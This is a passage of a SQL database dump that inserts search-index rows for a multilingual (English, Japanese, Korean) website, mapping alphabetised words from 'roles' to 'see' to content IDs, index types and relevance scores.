('roles', 85, 'en', 'help_search', 4),
('roles', 85, 'ja', 'help_search', 4),
('roles', 85, 'ko', 'help_search', 4),
('room201', 11, 'en', 'node_search', 1),
('room201', 11, 'ja', 'node_search', 1),
('routines', 142, 'en', 'node_search', 1),
('row', 5, 'en', 'help_search', 1),
('row', 5, 'ja', 'help_search', 1),
('row', 5, 'ko', 'help_search', 1),
('row', 25, 'ja', 'help_search', 1),
('row', 26, 'en', 'help_search', 1),
('row', 26, 'ja', 'help_search', 1),
('row', 26, 'ko', 'help_search', 1),
('row', 42, 'en', 'help_search', 4),
('row', 42, 'ja', 'help_search', 4),
('row', 42, 'ko', 'help_search', 4),
('row', 61, 'en', 'help_search', 1),
('row', 61, 'ja', 'help_search', 1),
('row', 61, 'ko', 'help_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('row', 71, 'en', 'help_search', 1),
('row', 71, 'ja', 'help_search', 1),
('row', 71, 'ko', 'help_search', 1),
('row', 85, 'en', 'help_search', 1),
('row', 85, 'ja', 'help_search', 1),
('row', 85, 'ko', 'help_search', 1),
('row', 89, 'en', 'help_search', 1),
('row', 89, 'ja', 'help_search', 1),
('row', 89, 'ko', 'help_search', 1),
('rows', 42, 'en', 'help_search', 1),
('rows', 42, 'ja', 'help_search', 1),
('rows', 42, 'ko', 'help_search', 1),
('rss', 93, 'en', 'help_search', 1),
('rss', 93, 'ja', 'help_search', 1),
('rss', 93, 'ko', 'help_search', 1),
('rules', 3, 'en', 'node_search', 0.989021),
('rules', 3, 'ko', 'node_search', 0.980874),
('run', 28, 'en', 'help_search', 0.813674),
('run', 28, 'ja', 'help_search', 0.813674),
('run', 28, 'ko', 'help_search', 0.813674),
('run', 29, 'en', 'help_search', 1),
('run', 29, 'ja', 'help_search', 1),
('run', 29, 'ko', 'help_search', 1),
('run', 32, 'en', 'help_search', 22.9397),
('run', 32, 'ja', 'help_search', 22.9397),
('run', 32, 'ko', 'help_search', 22.9397),
('run', 45, 'en', 'help_search', 1),
('run', 45, 'ja', 'help_search', 1),
('run', 45, 'ko', 'help_search', 1),
('run', 67, 'en', 'help_search', 4.89945),
('run', 67, 'ja', 'help_search', 4.89945),
('run', 67, 'ko', 'help_search', 4.89945),
('run', 70, 'en', 'help_search', 1),
('run', 70, 'ja', 'help_search', 1),
('run', 70, 'ko', 'help_search', 1),
('run', 76, 'en', 'help_search', 1),
('run', 76, 'ja', 'help_search', 1),
('run', 76, 'ko', 'help_search', 1),
('running', 32, 'en', 'help_search', 51),
('running', 32, 'ja', 'help_search', 51),
('running', 32, 'ko', 'help_search', 51),
('running', 45, 'en', 'help_search', 1),
('running', 45, 'ja', 'help_search', 1),
('running', 45, 'ko', 'help_search', 1),
('running', 67, 'en', 'help_search', 1.91323),
('running', 67, 'ja', 'help_search', 1.91323),
('running', 67, 'ko', 'help_search', 1.91323),
('running', 76, 'en', 'help_search', 26),
('running', 76, 'ja', 'help_search', 26),
('running', 76, 'ko', 'help_search', 26),
('runs', 32, 'en', 'help_search', 0.993146),
('runs', 32, 'ja', 'help_search', 0.993146),
('runs', 32, 'ko', 'help_search', 0.993146),
('runs', 34, 'en', 'help_search', 1),
('runs', 34, 'ja', 'help_search', 1),
('runs', 34, 'ko', 'help_search', 1),
('runs', 67, 'en', 'help_search', 2),
('runs', 67, 'ja', 'help_search', 2),
('runs', 67, 'ko', 'help_search', 2),
('runtime', 72, 'en', 'help_search', 1),
('runtime', 72, 'ja', 'help_search', 1),
('runtime', 72, 'ko', 'help_search', 1),
('ryokans', 155, 'en', 'node_search', 1),
('sabai', 176, 'ja', 'node_search', 1),
('sabi', 176, 'en', 'node_search', 1),
('sabi', 192, 'en', 'node_search', 3),
('sabi', 192, 'ja', 'node_search', 4.11692),
('safe', 28, 'en', 'help_search', 0.869951),
('safe', 28, 'ja', 'help_search', 0.869951),
('safe', 28, 'ko', 'help_search', 0.869951),
('safe', 73, 'en', 'node_search', 1),
('safe', 154, 'en', 'node_search', 1),
('safe', 156, 'en', 'node_search', 1),
('safe', 157, 'en', 'node_search', 1),
('sagaing', 24, 'en', 'node_search', 0.718502),
('sagaing', 24, 'ko', 'node_search', 0.689612),
('sagaing', 27, 'en', 'node_search', 3),
('salary', 5, 'en', 'node_search', 1),
('salary', 5, 'ko', 'node_search', 1),
('salary', 31, 'en', 'node_search', 2),
('salary', 162, 'en', 'node_search', 5),
('sale', 23, 'en', 'node_search', 1),
('sale', 27, 'en', 'node_search', 4.75845),
('sales', 30, 'en', 'node_search', 2),
('saloon', 27, 'en', 'node_search', 0.670377),
('same', 7, 'en', 'help_search', 4.96161),
('same', 7, 'ja', 'help_search', 4.96161),
('same', 7, 'ko', 'help_search', 4.96161),
('same', 24, 'en', 'node_search', 0.766757),
('same', 30, 'en', 'help_search', 2.67583),
('same', 30, 'ja', 'help_search', 2.67583),
('same', 30, 'ko', 'help_search', 2.67583),
('same', 31, 'ja', 'help_search', 1.89712),
('same', 37, 'en', 'help_search', 1),
('same', 37, 'ja', 'help_search', 1),
('same', 37, 'ko', 'help_search', 1),
('same', 39, 'en', 'help_search', 1),
('same', 39, 'ja', 'help_search', 1),
('same', 39, 'ko', 'help_search', 1),
('same', 50, 'en', 'help_search', 1),
('same', 50, 'ja', 'help_search', 1),
('same', 50, 'ko', 'help_search', 1),
('same', 74, 'en', 'help_search', 1),
('same', 74, 'ja', 'help_search', 1),
('same', 74, 'ko', 'help_search', 1),
('san', 128, 'en', 'node_search', 6),
('san', 128, 'ja', 'node_search', 6),
('san', 130, 'en', 'node_search', 1),
('san', 130, 'ja', 'node_search', 1),
('san', 151, 'en', 'node_search', 1),
('san', 151, 'ja', 'node_search', 1),
('san', 153, 'en', 'node_search', 1),
('san', 153, 'ja', 'node_search', 1),
('san', 181, 'en', 'node_search', 3),
('san', 181, 'ja', 'node_search', 2.80275),
('sandar', 127, 'en', 'node_search', 28),
('sandar', 127, 'ja', 'node_search', 31),
('sapal', 104, 'en', 'node_search', 28),
('sapal', 104, 'ja', 'node_search', 37),
('sat', 6, 'en', 'node_search', 1),
('sat', 6, 'ja', 'node_search', 1),
('sat', 6, 'ko', 'node_search', 1),
('sat', 9, 'en', 'node_search', 1),
('sat', 9, 'ja', 'node_search', 1),
('sat', 9, 'ko', 'node_search', 1),
('sat', 17, 'en', 'node_search', 2),
('sat', 17, 'ja', 'node_search', 1),
('sat', 17, 'ko', 'node_search', 1),
('sat', 18, 'en', 'node_search', 1),
('sat', 19, 'en', 'node_search', 1),
('sat', 20, 'en', 'node_search', 1),
('sat', 28, 'en', 'node_search', 1),
('sat', 28, 'ja', 'node_search', 1),
('sat', 28, 'ko', 'node_search', 1),
('sat', 29, 'en', 'node_search', 1),
('sat', 29, 'ja', 'node_search', 1),
('sat', 29, 'ko', 'node_search', 1),
('sat', 93, 'en', 'node_search', 1),
('sat', 93, 'ja', 'node_search', 1),
('sat', 94, 'en', 'node_search', 1),
('sat', 96, 'en', 'node_search', 1),
('sat', 96, 'ja', 'node_search', 1),
('sat', 97, 'en', 'node_search', 1),
('sat', 97, 'ja', 'node_search', 1),
('sat', 98, 'en', 'node_search', 1),
('sat', 98, 'ja', 'node_search', 1),
('sat', 99, 'en', 'node_search', 1),
('sat', 99, 'ja', 'node_search', 1),
('sat', 116, 'en', 'node_search', 1),
('sat', 116, 'ja', 'node_search', 1),
('sat', 123, 'en', 'node_search', 1),
('sat', 123, 'ja', 'node_search', 1),
('sat', 124, 'en', 'node_search', 1),
('sat', 124, 'ja', 'node_search', 1),
('sat', 125, 'en', 'node_search', 1),
('sat', 125, 'ja', 'node_search', 1),
('sat', 127, 'en', 'node_search', 1),
('sat', 127, 'ja', 'node_search', 1),
('sat', 128, 'en', 'node_search', 1),
('sat', 128, 'ja', 'node_search', 1),
('sat', 129, 'en', 'node_search', 1),
('sat', 129, 'ja', 'node_search', 1),
('sat', 130, 'en', 'node_search', 1),
('sat', 130, 'ja', 'node_search', 1),
('sat', 131, 'en', 'node_search', 1),
('sat', 131, 'ja', 'node_search', 1),
('sat', 133, 'en', 'node_search', 1),
('sat', 133, 'ja', 'node_search', 1),
('sat', 137, 'en', 'node_search', 1),
('sat', 137, 'ja', 'node_search', 1),
('sat', 139, 'en', 'node_search', 1),
('sat', 139, 'ja', 'node_search', 1),
('sat', 141, 'en', 'node_search', 1),
('sat', 141, 'ja', 'node_search', 1),
('sat', 147, 'en', 'node_search', 1),
('sat', 147, 'ja', 'node_search', 1),
('sat', 152, 'en', 'node_search', 1),
('sat', 152, 'ja', 'node_search', 1),
('sat', 170, 'en', 'node_search', 1),
('sat', 170, 'ja', 'node_search', 1),
('sat', 178, 'en', 'node_search', 1),
('sat', 178, 'ja', 'node_search', 1),
('sat', 185, 'en', 'node_search', 1),
('sat', 185, 'ja', 'node_search', 1),
('sat', 186, 'en', 'node_search', 1),
('sat', 186, 'ja', 'node_search', 1),
('sat', 187, 'en', 'node_search', 2),
('sat', 187, 'ja', 'node_search', 2),
('sat', 188, 'en', 'node_search', 1),
('sat', 188, 'ja', 'node_search', 1),
('sat', 189, 'en', 'node_search', 1),
('sat', 189, 'ja', 'node_search', 1),
('sat', 190, 'en', 'node_search', 1),
('sat', 190, 'ja', 'node_search', 1),
('sat', 191, 'en', 'node_search', 1),
('sat', 191, 'ja', 'node_search', 1),
('sat', 192, 'en', 'node_search', 1),
('sat', 192, 'ja', 'node_search', 1),
('sat', 193, 'en', 'node_search', 1),
('sat', 193, 'ja', 'node_search', 1),
('sat', 194, 'en', 'node_search', 1),
('sat', 194, 'ja', 'node_search', 1),
('sat', 195, 'en', 'node_search', 1),
('sat', 195, 'ja', 'node_search', 1),
('sat', 196, 'en', 'node_search', 1),
('sat', 196, 'ja', 'node_search', 1),
('sat', 197, 'en', 'node_search', 1),
('sat', 197, 'ja', 'node_search', 1),
('sat', 198, 'en', 'node_search', 1),
('sat', 198, 'ja', 'node_search', 1),
('sat', 199, 'en', 'node_search', 1),
('sat', 199, 'ja', 'node_search', 1),
('sat', 200, 'ja', 'node_search', 1),
('satisfaction', 27, 'en', 'node_search', 0.630018),
('save', 1, 'en', 'help_search', 8),
('save', 1, 'ja', 'help_search', 8),
('save', 1, 'ko', 'help_search', 8),
('save', 3, 'en', 'help_search', 4),
('save', 3, 'ja', 'help_search', 4),
('save', 3, 'ko', 'help_search', 4),
('save', 4, 'en', 'help_search', 4),
('save', 4, 'ja', 'help_search', 4),
('save', 4, 'ko', 'help_search', 4),
('save', 5, 'en', 'help_search', 4),
('save', 5, 'ja', 'help_search', 4),
('save', 5, 'ko', 'help_search', 4),
('save', 8, 'en', 'help_search', 4),
('save', 8, 'ja', 'help_search', 4),
('save', 8, 'ko', 'help_search', 4),
('save', 9, 'en', 'help_search', 1),
('save', 9, 'ja', 'help_search', 1),
('save', 9, 'ko', 'help_search', 1),
('save', 12, 'en', 'help_search', 1),
('save', 12, 'ja', 'help_search', 1),
('save', 12, 'ko', 'help_search', 1),
('save', 13, 'en', 'help_search', 1),
('save', 13, 'ja', 'help_search', 1),
('save', 13, 'ko', 'help_search', 1),
('save', 16, 'en', 'help_search', 1),
('save', 16, 'ja', 'help_search', 1),
('save', 16, 'ko', 'help_search', 1),
('save', 18, 'en', 'help_search', 8),
('save', 18, 'ja', 'help_search', 8),
('save', 18, 'ko', 'help_search', 8),
('save', 19, 'en', 'help_search', 4),
('save', 19, 'ja', 'help_search', 4),
('save', 19, 'ko', 'help_search', 4),
('save', 21, 'en', 'help_search', 4),
('save', 21, 'ja', 'help_search', 4),
('save', 21, 'ko', 'help_search', 4),
('save', 22, 'en', 'help_search', 0.976851),
('save', 22, 'ja', 'help_search', 0.976851),
('save', 22, 'ko', 'help_search', 0.976851),
('save', 23, 'en', 'help_search', 0.833529),
('save', 23, 'ja', 'help_search', 0.833529),
('save', 23, 'ko', 'help_search', 0.833529),
('save', 24, 'en', 'help_search', 13),
('save', 24, 'ja', 'help_search', 13),
('save', 24, 'ko', 'help_search', 13),
('save', 25, 'ja', 'help_search', 4),
('save', 26, 'en', 'help_search', 4),
('save', 26, 'ja', 'help_search', 4),
('save', 26, 'ko', 'help_search', 4),
('save', 27, 'en', 'help_search', 13),
('save', 27, 'ja', 'help_search', 13),
('save', 27, 'ko', 'help_search', 13),
('save', 28, 'en', 'help_search', 3.13735),
('save', 28, 'ja', 'help_search', 3.13735),
('save', 28, 'ko', 'help_search', 3.13735),
('save', 32, 'en', 'help_search', 3.9235),
('save', 32, 'ja', 'help_search', 3.9235),
('save', 32, 'ko', 'help_search', 3.9235),
('save', 48, 'en', 'help_search', 5),
('save', 48, 'ja', 'help_search', 5),
('save', 48, 'ko', 'help_search', 5),
('save', 50, 'en', 'help_search', 3.93972),
('save', 50, 'ja', 'help_search', 3.93972),
('save', 50, 'ko', 'help_search', 3.93972),
('save', 52, 'en', 'help_search', 4),
('save', 52, 'ja', 'help_search', 4),
('save', 52, 'ko', 'help_search', 4),
('save', 54, 'en', 'help_search', 8),
('save', 54, 'ja', 'help_search', 8),
('save', 54, 'ko', 'help_search', 8),
('save', 55, 'en', 'help_search', 4),
('save', 55, 'ja', 'help_search', 4),
('save', 55, 'ko', 'help_search', 4),
('save', 56, 'en', 'help_search', 8),
('save', 56, 'ja', 'help_search', 8),
('save', 56, 'ko', 'help_search', 8),
('save', 57, 'en', 'help_search', 4),
('save', 57, 'ja', 'help_search', 4),
('save', 57, 'ko', 'help_search', 4),
('save', 58, 'en', 'help_search', 5),
('save', 58, 'ja', 'help_search', 5),
('save', 58, 'ko', 'help_search', 5),
('save', 59, 'en', 'help_search', 4),
('save', 59, 'ja', 'help_search', 4),
('save', 59, 'ko', 'help_search', 4),
('save', 60, 'en', 'help_search', 8),
('save', 60, 'ja', 'help_search', 8),
('save', 60, 'ko', 'help_search', 8),
('save', 61, 'en', 'help_search', 4),
('save', 61, 'ja', 'help_search', 4),
('save', 61, 'ko', 'help_search', 4),
('save', 63, 'en', 'help_search', 4),
('save', 63, 'ja', 'help_search', 4),
('save', 63, 'ko', 'help_search', 4),
('save', 64, 'en', 'help_search', 4),
('save', 64, 'ja', 'help_search', 4),
('save', 64, 'ko', 'help_search', 4),
('save', 66, 'en', 'help_search', 4),
('save', 66, 'ja', 'help_search', 4),
('save', 67, 'en', 'help_search', 3.85992),
('save', 67, 'ja', 'help_search', 3.85992),
('save', 67, 'ko', 'help_search', 3.85992),
('save', 70, 'en', 'help_search', 1),
('save', 70, 'ja', 'help_search', 1),
('save', 70, 'ko', 'help_search', 1),
('save', 71, 'en', 'help_search', 12),
('save', 71, 'ja', 'help_search', 12),
('save', 71, 'ko', 'help_search', 12),
('save', 72, 'en', 'help_search', 7.45773),
('save', 72, 'ja', 'help_search', 7.45773),
('save', 72, 'ko', 'help_search', 7.45773),
('save', 73, 'en', 'help_search', 8),
('save', 73, 'ja', 'help_search', 8),
('save', 73, 'ko', 'help_search', 8),
('save', 77, 'en', 'help_search', 4),
('save', 77, 'ja', 'help_search', 4),
('save', 77, 'ko', 'help_search', 4),
('save', 79, 'en', 'help_search', 8),
('save', 79, 'ja', 'help_search', 8),
('save', 79, 'ko', 'help_search', 8),
('save', 83, 'en', 'help_search', 4),
('save', 83, 'ja', 'help_search', 4),
('save', 83, 'ko', 'help_search', 4),
('save', 85, 'en', 'help_search', 4),
('save', 85, 'ja', 'help_search', 4),
('save', 85, 'ko', 'help_search', 4),
('save', 86, 'en', 'help_search', 3.87562),
('save', 86, 'ja', 'help_search', 3.87562),
('save', 86, 'ko', 'help_search', 3.87562),
('save', 87, 'en', 'help_search', 4),
('save', 87, 'ja', 'help_search', 4),
('save', 87, 'ko', 'help_search', 4),
('save', 89, 'en', 'help_search', 3.95608),
('save', 89, 'ja', 'help_search', 3.93972),
('save', 89, 'ko', 'help_search', 3.95608),
('save', 90, 'en', 'help_search', 4),
('save', 90, 'ja', 'help_search', 4),
('save', 90, 'ko', 'help_search', 4),
('save', 91, 'en', 'help_search', 4),
('save', 91, 'ja', 'help_search', 4),
('save', 91, 'ko', 'help_search', 4),
('save', 92, 'en', 'help_search', 4),
('save', 92, 'ja', 'help_search', 4),
('save', 92, 'ko', 'help_search', 4),
('saved', 71, 'en', 'help_search', 3),
('saved', 71, 'ja', 'help_search', 3),
('saved', 71, 'ko', 'help_search', 3),
('saved', 72, 'en', 'help_search', 1.84154),
('saved', 72, 'ja', 'help_search', 1.84154),
('saved', 72, 'ko', 'help_search', 1.84154),
('saved', 86, 'en', 'help_search', 0.949597),
('saved', 86, 'ja', 'help_search', 0.949597),
('saved', 86, 'ko', 'help_search', 0.949597),
('saves', 37, 'en', 'help_search', 1),
('saves', 37, 'ja', 'help_search', 1),
('saves', 37, 'ko', 'help_search', 1),
('saving', 27, 'en', 'node_search', 0.794753),
('saving', 37, 'en', 'help_search', 1),
('saving', 37, 'ja', 'help_search', 1),
('saving', 37, 'ko', 'help_search', 1),
('say', 60, 'en', 'help_search', 1),
('say', 60, 'ja', 'help_search', 1),
('say', 60, 'ko', 'help_search', 1),
('sayah', 75, 'en', 'node_search', 28),
('sayah', 75, 'ja', 'node_search', 27),
('sayar', 75, 'ja', 'node_search', 1),
('saying', 74, 'en', 'help_search', 1),
('saying', 74, 'ja', 'help_search', 1),
('saying', 74, 'ko', 'help_search', 1),
('saying', 75, 'en', 'help_search', 1),
('saying', 75, 'ja', 'help_search', 1),
('saying', 75, 'ko', 'help_search', 1),
('says', 32, 'en', 'help_search', 1),
('says', 32, 'ja', 'help_search', 1),
('says', 32, 'ko', 'help_search', 1),
('scaffolding', 29, 'en', 'help_search', 1),
('scaffolding', 29, 'ja', 'help_search', 1),
('scaffolding', 29, 'ko', 'help_search', 1),
('scaling', 35, 'en', 'help_search', 1),
('scaling', 35, 'ja', 'help_search', 1),
('scaling', 35, 'ko', 'help_search', 1),
('scan', 27, 'en', 'help_search', 1),
('scan', 27, 'ja', 'help_search', 1),
('scan', 27, 'ko', 'help_search', 1),
('scan', 76, 'en', 'help_search', 1),
('scan', 76, 'ja', 'help_search', 1),
('scan', 76, 'ko', 'help_search', 1),
('scenarios', 135, 'en', 'node_search', 1),
('schedule', 32, 'en', 'help_search', 4.99315),
('schedule', 32, 'ja', 'help_search', 4.99315),
('schedule', 32, 'ko', 'help_search', 4.99315),
('schedule', 62, 'en', 'node_search', 1.86295),
('schedule', 162, 'en', 'node_search', 0.931053),
('school', 9, 'en', 'node_search', 3),
('school', 17, 'en', 'node_search', 4),
('school', 27, 'en', 'node_search', 0.699655),
('school', 142, 'en', 'node_search', 1),
('schools', 23, 'en', 'node_search', 0.784336),
('schools', 24, 'en', 'node_search', 1.46813),
('schools', 27, 'en', 'node_search', 1.60908),
('scrambled', 204, 'en', 'node_search', 4),
('scrambled', 204, 'ja', 'node_search', 4),
('screen', 23, 'en', 'help_search', 1),
('screen', 23, 'ja', 'help_search', 1),
('screen', 23, 'ko', 'help_search', 1),
('screen', 24, 'en', 'help_search', 2),
('screen', 24, 'ja', 'help_search', 2),
('screen', 24, 'ko', 'help_search', 2),
('screen', 25, 'ja', 'help_search', 1),
('screen', 27, 'en', 'help_search', 2),
('screen', 27, 'ja', 'help_search', 2),
('screen', 27, 'ko', 'help_search', 2),
('screen', 42, 'en', 'help_search', 1),
('screen', 42, 'ja', 'help_search', 1),
('screen', 42, 'ko', 'help_search', 1),
('screen', 72, 'en', 'help_search', 4),
('screen', 72, 'ja', 'help_search', 4),
('screen', 72, 'ko', 'help_search', 4),
('screen', 87, 'en', 'help_search', 1),
('screen', 87, 'ja', 'help_search', 1),
('screen', 87, 'ko', 'help_search', 1),
('screens', 6, 'en', 'help_search', 1),
('screens', 6, 'ja', 'help_search', 1),
('screens', 6, 'ko', 'help_search', 1),
('screens', 55, 'en', 'help_search', 1),
('screens', 55, 'ja', 'help_search', 1),
('screens', 55, 'ko', 'help_search', 1),
('screens', 59, 'en', 'help_search', 1),
('screens', 59, 'ja', 'help_search', 1),
('screens', 59, 'ko', 'help_search', 1),
('scripts', 28, 'en', 'help_search', 0.892724),
('scripts', 28, 'ja', 'help_search', 0.892724),
('scripts', 28, 'ko', 'help_search', 0.892724),
('scroll', 66, 'en', 'help_search', 1),
('scroll', 66, 'ja', 'help_search', 1),
('scroll', 87, 'en', 'help_search', 1),
('scroll', 87, 'ja', 'help_search', 1),
('scroll', 87, 'ko', 'help_search', 1),
('sdf', 206, 'ja', 'node_search', 2),
('sdfs', 206, 'ja', 'node_search', 1),
('sdfsdf', 206, 'ja', 'node_search', 1),
('sdfsdfs', 206, 'ja', 'node_search', 1),
('seamless', 135, 'en', 'node_search', 1),
('search', 25, 'ja', 'help_search', 1),
('search', 45, 'en', 'help_search', 55),
('search', 45, 'ja', 'help_search', 55),
('search', 45, 'ko', 'help_search', 55),
('search', 46, 'en', 'help_search', 28.8536),
('search', 46, 'ja', 'help_search', 28.8536),
('search', 46, 'ko', 'help_search', 28.8536),
('search', 52, 'en', 'help_search', 1),
('search', 52, 'ja', 'help_search', 1),
('search', 52, 'ko', 'help_search', 1),
('search', 64, 'en', 'help_search', 4),
('search', 64, 'ja', 'help_search', 4),
('search', 64, 'ko', 'help_search', 4),
('search', 66, 'en', 'help_search', 62),
('search', 66, 'ja', 'help_search', 62),
('search', 66, 'ko', 'help_search', 62),
('search', 67, 'en', 'help_search', 69.082),
('search', 67, 'ja', 'help_search', 69.082),
('search', 67, 'ko', 'help_search', 69.082),
('search', 68, 'en', 'help_search', 197.652),
('search', 68, 'ja', 'help_search', 197.652),
('search', 68, 'ko', 'help_search', 197.652),
('search', 84, 'en', 'help_search', 1),
('search', 84, 'ja', 'help_search', 1),
('search', 84, 'ko', 'help_search', 1),
('searchable', 46, 'en', 'help_search', 1),
('searchable', 46, 'ja', 'help_search', 1),
('searchable', 46, 'ko', 'help_search', 1),
('searched', 28, 'en', 'node_search', 1),
('searches', 67, 'en', 'help_search', 1),
('searches', 67, 'ja', 'help_search', 1),
('searches', 67, 'ko', 'help_search', 1),
('searches', 68, 'en', 'help_search', 0.882818),
('searches', 68, 'ja', 'help_search', 0.882818),
('searches', 68, 'ko', 'help_search', 0.882818),
('searching', 45, 'en', 'help_search', 1),
('searching', 45, 'ja', 'help_search', 1),
('searching', 45, 'ko', 'help_search', 1),
('searching', 67, 'en', 'help_search', 2.89272),
('searching', 67, 'ja', 'help_search', 2.89272),
('searching', 67, 'ko', 'help_search', 2.89272),
('searching', 68, 'en', 'help_search', 4.80231),
('searching', 68, 'ja', 'help_search', 4.80231),
('searching', 68, 'ko', 'help_search', 4.80231),
('seasonal', 122, 'en', 'node_search', 1),
('seasoned', 116, 'en', 'node_search', 1),
('second', 3, 'en', 'node_search', 1),
('second', 3, 'ko', 'node_search', 1),
('second', 68, 'en', 'help_search', 1),
('second', 68, 'ja', 'help_search', 1),
('second', 68, 'ko', 'help_search', 1),
('second', 91, 'en', 'help_search', 1),
('second', 91, 'ja', 'help_search', 1),
('second', 91, 'ko', 'help_search', 1),
('section', 18, 'en', 'help_search', 3),
('section', 18, 'ja', 'help_search', 3),
('section', 18, 'ko', 'help_search', 3),
('section', 23, 'en', 'help_search', 0.854391),
('section', 23, 'ja', 'help_search', 0.854391),
('section', 23, 'ko', 'help_search', 0.854391),
('section', 25, 'en', 'help_search', 1),
('section', 25, 'ja', 'help_search', 1),
('section', 26, 'en', 'help_search', 1),
('section', 26, 'ja', 'help_search', 1),
('section', 26, 'ko', 'help_search', 1),
('section', 27, 'en', 'help_search', 2),
('section', 27, 'ja', 'help_search', 2),
('section', 27, 'ko', 'help_search', 2),
('section', 45, 'en', 'help_search', 1),
('section', 45, 'ja', 'help_search', 1),
('section', 45, 'ko', 'help_search', 1),
('section', 54, 'en', 'help_search', 1),
('section', 54, 'ja', 'help_search', 1),
('section', 54, 'ko', 'help_search', 1),
('section', 60, 'en', 'help_search', 1),
('section', 60, 'ja', 'help_search', 1),
('section', 60, 'ko', 'help_search', 1),
('section', 66, 'en', 'help_search', 1),
('section', 66, 'ja', 'help_search', 1),
('section', 67, 'en', 'help_search', 0.869951),
('section', 67, 'ja', 'help_search', 0.869951),
('section', 67, 'ko', 'help_search', 0.869951),
('section', 72, 'en', 'help_search', 1),
('section', 72, 'ja', 'help_search', 1),
('section', 72, 'ko', 'help_search', 1),
('section', 77, 'en', 'help_search', 2),
('section', 77, 'ja', 'help_search', 2),
('section', 77, 'ko', 'help_search', 2),
('section', 78, 'en', 'help_search', 1),
('section', 78, 'ja', 'help_search', 1),
('section', 78, 'ko', 'help_search', 1),
('section', 89, 'en', 'help_search', 1),
('section', 89, 'ja', 'help_search', 1),
('section', 89, 'ko', 'help_search', 1),
('section', 91, 'en', 'help_search', 1),
('section', 91, 'ja', 'help_search', 1),
('section', 91, 'ko', 'help_search', 1),
('section', 92, 'en', 'help_search', 2),
('section', 92, 'ja', 'help_search', 2),
('section', 92, 'ko', 'help_search', 2),
('sections', 4, 'en', 'node_search', 1),
('sections', 4, 'ja', 'node_search', 1),
('sections', 43, 'en', 'help_search', 20),
('sections', 43, 'ja', 'help_search', 20),
('sections', 43, 'ko', 'help_search', 20),
('sections', 91, 'en', 'help_search', 2),
('sections', 91, 'ja', 'help_search', 2),
('sections', 91, 'ko', 'help_search', 2),
('sector', 135, 'en', 'node_search', 1),
('sector', 155, 'en', 'node_search', 1),
('sector', 165, 'en', 'node_search', 1),
('sector', 168, 'en', 'node_search', 5),
('sector', 169, 'en', 'node_search', 1),
('sector', 170, 'en', 'node_search', 4),
('sector', 171, 'en', 'node_search', 1),
('sector', 178, 'en', 'node_search', 1),
('sector', 185, 'en', 'node_search', 1),
('sector', 187, 'en', 'node_search', 1),
('sector', 188, 'en', 'node_search', 1),
('sector', 189, 'en', 'node_search', 1),
('sector', 197, 'en', 'node_search', 1),
('sector', 198, 'en', 'node_search', 1),
('sectors', 27, 'en', 'node_search', 1.57132),
('secure', 38, 'en', 'help_search', 28),
('secure', 38, 'ja', 'help_search', 28),
('secure', 38, 'ko', 'help_search', 28),
('secure', 66, 'en', 'node_search', 4),
('security', 28, 'en', 'help_search', 5.32828),
('security', 28, 'ja', 'help_search', 5.32828),
('security', 28, 'ko', 'help_search', 5.32828),
('security', 34, 'en', 'help_search', 11),
('security', 34, 'ja', 'help_search', 11),
('security', 34, 'ko', 'help_search', 11),
('security', 38, 'en', 'help_search', 102),
('security', 38, 'ja', 'help_search', 102),
('security', 38, 'ko', 'help_search', 102),
('security', 43, 'en', 'help_search', 0.899454),
('security', 43, 'ja', 'help_search', 0.899454),
('security', 43, 'ko', 'help_search', 0.899454),
('security', 76, 'en', 'help_search', 13),
('security', 76, 'ja', 'help_search', 13),
('security', 76, 'ko', 'help_search', 13),
('security', 85, 'en', 'help_search', 4),
('security', 85, 'ja', 'help_search', 4),
('security', 85, 'ko', 'help_search', 4),
('see', 1, 'en', 'help_search', 1),
('see', 1, 'ja', 'help_search', 1),
('see', 1, 'ko', 'help_search', 1),
('see', 2, 'en', 'help_search', 1),
('see', 2, 'ja', 'help_search', 1),
('see', 2, 'ko', 'help_search', 1),
('see', 3, 'en', 'help_search', 2),
('see', 3, 'ja', 'help_search', 2),
('see', 3, 'ko', 'help_search', 2),
('see', 7, 'en', 'help_search', 1),
('see', 7, 'ja', 'help_search', 1),
('see', 7, 'ko', 'help_search', 1),
('see', 8, 'en', 'help_search', 2),
('see', 8, 'ja', 'help_search', 2),
('see', 8, 'ko', 'help_search', 2),
('see', 9, 'en', 'help_search', 2),
('see', 9, 'ja', 'help_search', 2),
('see', 9, 'ko', 'help_search', 2),
('see', 11, 'en', 'help_search', 2.78353),
('see', 11, 'ja', 'help_search', 2.78353),
('see', 11, 'ko', 'help_search', 2.78353),
('see', 12, 'en', 'help_search', 1),
('see', 12, 'ja', 'help_search', 1),
('see', 12, 'ko', 'help_search', 1),
('see', 13, 'en', 'help_search', 1),
('see', 13, 'ja', 'help_search', 1),
('see', 13, 'ko', 'help_search', 1),
('see', 14, 'en', 'help_search', 2),
('see', 14, 'ja', 'help_search', 2),
('see', 14, 'ko', 'help_search', 2),
('see', 15, 'en', 'help_search', 2),
('see', 15, 'ja', 'help_search', 2),
('see', 15, 'ko', 'help_search', 2),
('see', 16, 'en', 'help_search', 2),
('see', 16, 'ja', 'help_search', 2),
('see', 16, 'ko', 'help_search', 2),
('see', 19, 'en', 'help_search', 1),
('see', 19, 'ja', 'help_search', 1),
('see', 19, 'ko', 'help_search', 1),
('see', 20, 'en', 'help_search', 2),
('see', 20, 'ja', 'help_search', 2),
('see', 20, 'ko', 'help_search', 2),
('see', 23, 'en', 'help_search', 5),
('see', 23, 'ja', 'help_search', 5),
('see', 23, 'ko', 'help_search', 5),
('see', 24, 'en', 'help_search', 2),
('see', 24, 'ja', 'help_search', 2),
('see', 24, 'ko', 'help_search', 2),
('see', 25, 'en', 'help_search', 2),
('see', 25, 'ja', 'help_search', 2),
('see', 26, 'en', 'help_search', 2),
('see', 26, 'ja', 'help_search', 2),
('see', 26, 'ko', 'help_search', 2),
('see', 27, 'en', 'help_search', 1),
('see', 27, 'ja', 'help_search', 1),
('see', 27, 'ko', 'help_search', 1),
('see', 28, 'en', 'help_search', 0.857458),
('see', 28, 'ja', 'help_search', 0.857458),
('see', 28, 'ko', 'help_search', 0.857458),
('see', 29, 'en', 'help_search', 1.96109),
('see', 29, 'ja', 'help_search', 1.96109),
('see', 29, 'ko', 'help_search', 1.96109),
('see', 30, 'en', 'help_search', 0.691597),
('see', 30, 'ja', 'help_search', 0.691597),
('see', 30, 'ko', 'help_search', 0.691597),
('see', 33, 'en', 'help_search', 1),
('see', 33, 'ja', 'help_search', 1),
('see', 33, 'ko', 'help_search', 1),
('see', 34, 'en', 'help_search', 1),
